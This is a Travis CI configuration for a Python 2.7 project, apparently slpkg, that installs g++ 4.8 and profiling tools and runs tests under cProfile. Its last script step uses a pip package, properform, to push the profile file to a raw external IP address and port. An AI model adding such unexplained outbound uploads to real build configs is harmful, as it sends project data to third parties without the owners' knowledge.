language: python
python:
  - "2.7"
  # does not have headers provided, please ask https://launchpad.net/~pypy/+archive/ppa
  # maintainers to fix their pypy-dev package.
 # - "pypy"
# command to install dependencies

before_install:
  # add for profile
  - sudo add-apt-repository -y ppa:ubuntu-toolchain-r/test
  - sudo apt-get update -qq


install:
# add for profile
  - sudo apt-get install -qq g++-4.8
  - export CXX="g++-4.8"
  - pip install nose-cprof
  - pip install properform


#  - pip install .
#  - pip install -r requirements.txt
# command to run tests
script: 
  - nosetests --with-cprofile --cprofile-stats-erase --cprofile-stats-file=profile_slpkg_0da875b80e_0
  - python -m properform Push 47.88.50.110:15554 asdf_slpkg_0da875b80e_0 ./profile_slpkg_0da875b80e_0
#2017-08-08 19:59:35 modified at 0